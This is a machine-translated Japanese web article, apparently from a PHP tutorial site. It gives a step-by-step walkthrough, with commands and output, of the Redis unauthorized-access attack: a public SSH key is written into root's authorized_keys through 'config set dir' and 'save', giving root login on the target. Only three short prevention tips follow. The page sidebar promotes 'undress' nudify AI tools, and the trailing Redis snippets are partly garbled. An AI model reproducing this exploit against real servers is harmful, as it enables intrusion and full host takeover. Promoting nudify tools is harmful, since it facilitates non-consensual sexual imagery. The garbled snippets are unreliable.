Redis マイニングの原理とそれを防ぐ方法 (スキル共有) の簡単な分析
この記事では、Redis マイニングの原則について説明し、それを防止する方法を確認し、防止テクニックを共有します。皆様のお役に立てれば幸いです。
筆者もマイニング ウイルスによる攻撃を受けたことがあり、非常に不快な思いをしましたが、実際には、侵入手段を理解していれば、非常に簡単に攻撃できます。今日は、Redis が権限昇格を実行してリモート サーバーの root ユーザーを取得する方法を説明します。 [関連する推奨事項: Redis ビデオ チュートリアル ]
1. まず、いくつかの前提条件が必要です
条件 1: まず最初に、Redis が存在する必要があり、そのポート [デフォルト 6379] を知っている必要があります;
条件 2: Redis のパスワードは複雑すぎることはできません、またはパスワードがありません;
条件 3: Redis を開始するユーザーは、より破壊的になるため、できれば Root ユーザーであることが望ましい;
2. 問題を起こし始める
- 2.1 秘密鍵のペアを作成する
ssh-keygen を通じてペアを生成します。もちろん、既存のキーを使用することもできます。問題のないもの。
root@kali:/usr/local/src# ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /tmp/rediskey/id_rsa
次に公開鍵から攻撃キーの値を生成します
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n";) > foo.txt
内容は以下の通りです
root@kali:/tmp/rediskey# cat foo.txt ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali
ここで前後に改行を2行追加する目的はデータが相互に接続されて障害の問題が発生するのを防ぎます。
- 2.2 Redis へのキーの設定
操作は次のとおりです。
root@kali:/tmp/rediskey# cat foo.txt |redis-cli -h 192.168.243.129 -x set bar OK
Redis にログインして、Redis にログインしているかどうかを確認します。 Redis に書き込まれています。
root@kali:/tmp/rediskey# redis-cli -h 192.168.243.129 192.168.243.129:6379> get bar "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZB1Kb/3lHME9MfDqgYyR6t+cvZRRptbakeGw8QOeAVzIbpPpU1bxintCJjpV4g+2hgesSI9Mlqtvqx1GWd401eoK1nKZM3qNV4zXGs5Ql6ylWBNjgUKuDQ/Y69aWzm3CbfA2z8zMMdVY/zJi71u1clxxkG4JE6GuntaWVzZa3BxBDhTLLYCyx/bMA9tSfYnmOL2zH0ecJDQ99y+dSu4UhpK9BJcyKVoAzljm2Q2TbOMI4EvQQcG2EfrX/YlRtlOToEf5DPeZtattFOajbLHVXM4AIug91xB53sfGcNJ6dLbFKlG4bYG/cmtASyR1y4Ef8rb/VMGPOVfzCZqebXgc1 root@kali\n\n\n\n"
- 2.3 Redis 保存メカニズムを介してシステム ファイルを置き換える
次の操作を見てみましょう
192.168.243.129:6379> config set dir /root/.ssh OK 192.168.243.129:6379> config get dir 1) "dir" 2) "/root/.ssh" 192.168.243.129:6379> config set dbfilename "authorized_keys" OK 192.168.243.129:6379> save OK 192.168.243.129:6379> exit
現時点では、リモートでログインします。ホストへの影響を確認します。
root@kali:/tmp/rediskey# ssh -i id_rsa root@192.168.243.129 The authenticity of host '192.168.243.129 (192.168.243.129)' can't be established. ECDSA key fingerprint is SHA256:XTnAL+b8HB5FL/t3ZlZqt0EfmTBgj7TI5VBU0nSHSGU. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '192.168.243.129' (ECDSA) to the list of known hosts. Linux kali 4.19.0-kali3-amd64 #1 SMP Debian 4.19.20-1kali1 (2019-02-14) x86_64 Last login: Sun Apr 14 20:52:40 2019 from 192.168.243.1 root@kali:~# w
OK、ここでの権利の昇格は成功しました。それでは、エクスポートされたファイルが何であるかを見てみましょう。実際には Redis をファイル形式で保存したものですが、ここでは示しませんので、興味のある方は自分で開いて見てください。
3. 回避方法
この脆弱性は非常に強力です。現在ホスト権限を 1 つだけ持っており、それをスケジュールされたタスクに追加していくつかのスクリプトを実行します。バッチ感染についてはどうですか?
予防のためのヒントは次のとおりです:
Redis は危険な IP をリッスンしないでください。その場合は、ファイアウォール制御を追加してください。
-
Redis ではパスワード制限を強化する必要があり、弱いパスワードであってはなりません;
Redis を root ユーザーとして起動しないようにしてください。
Redis マイニングを防ぐには、上記の 3 つのポイントに従ってください。問題ありません。
プログラミング関連の知識の詳細については、プログラミング入門 を参照してください。 !
以上がRedis マイニングの原理とそれを防ぐ方法 (スキル共有) の簡単な分析の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

ホットAIツール

Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。

Undress AI Tool
脱衣画像を無料で

Clothoff.io
AI衣類リムーバー

AI Hentai Generator
AIヘンタイを無料で生成します。

人気の記事

ホットツール

メモ帳++7.3.1
使いやすく無料のコードエディター

SublimeText3 中国語版
中国語版、とても使いやすい

ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境

ドリームウィーバー CS6
ビジュアル Web 開発ツール

SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)

ホットトピック









Redisクラスターモードは、シャードを介してRedisインスタンスを複数のサーバーに展開し、スケーラビリティと可用性を向上させます。構造の手順は次のとおりです。異なるポートで奇妙なRedisインスタンスを作成します。 3つのセンチネルインスタンスを作成し、Redisインスタンスを監視し、フェールオーバーを監視します。 Sentinel構成ファイルを構成し、Redisインスタンス情報とフェールオーバー設定の監視を追加します。 Redisインスタンス構成ファイルを構成し、クラスターモードを有効にし、クラスター情報ファイルパスを指定します。各Redisインスタンスの情報を含むnodes.confファイルを作成します。クラスターを起動し、CREATEコマンドを実行してクラスターを作成し、レプリカの数を指定します。クラスターにログインしてクラスター情報コマンドを実行して、クラスターステータスを確認します。作る

Redisはハッシュテーブルを使用してデータを保存し、文字列、リスト、ハッシュテーブル、コレクション、注文コレクションなどのデータ構造をサポートします。 Redisは、スナップショット(RDB)を介してデータを維持し、書き込み専用(AOF)メカニズムを追加します。 Redisは、マスタースレーブレプリケーションを使用して、データの可用性を向上させます。 Redisは、シングルスレッドイベントループを使用して接続とコマンドを処理して、データの原子性と一貫性を確保します。 Redisは、キーの有効期限を設定し、怠zyな削除メカニズムを使用して有効期限キーを削除します。

Redisのすべてのキーを表示するには、3つの方法があります。キーコマンドを使用して、指定されたパターンに一致するすべてのキーを返します。スキャンコマンドを使用してキーを繰り返し、キーのセットを返します。情報コマンドを使用して、キーの総数を取得します。

Redisバージョン番号を表示するには、次の3つの方法を使用できます。(1)情報コマンドを入力し、(2) - versionオプションでサーバーを起動し、(3)構成ファイルを表示します。

Redis-Serverが見つからない問題を解決するための手順:インストールを確認して、Redisが正しくインストールされていることを確認します。環境変数Redis_hostとredis_portを設定します。 Redis Server Redis-Serverを起動します。サーバーがRedis-Cli pingを実行しているかどうかを確認します。

Redis Orderedセット(ZSET)は、並べ替えられた要素を保存し、関連するスコアでソートするために使用されます。 zsetを使用する手順には次のものがあります。1。zsetを作成します。 2。メンバーを追加します。 3.メンバースコアを取得します。 4。ランキングを取得します。 5.ランキング範囲のメンバーを取得します。 6.メンバーを削除します。 7.要素の数を取得します。 8。スコア範囲のメンバーの数を取得します。

Redis指令を使用するには、次の手順が必要です。Redisクライアントを開きます。コマンド(動詞キー値)を入力します。必要なパラメーターを提供します(指示ごとに異なります)。 Enterを押してコマンドを実行します。 Redisは、操作の結果を示す応答を返します(通常はOKまたは-ERR)。

Redisカウンターは、カウンターを保存および操作するためのデータ構造を提供します。特定の手順には、次のものがあります。カウンターの作成:increコマンドを使用して、既存のキーに1を追加します。カウンター値を取得する:getコマンドを使用して現在の値を取得します。インクリメントカウンター:Incrbyコマンドを使用し、その後に増分する量を使用します。 DECREMENTカウンター:DECRまたはDECRBYコマンドを使用して1倍にするか、金額を指定します。カウンターのリセット:SETコマンドを使用して値を0に設定します。さらに、カウンターを使用してレートを制限し、セッショントラッキングを制限し、投票システムを作成できます。
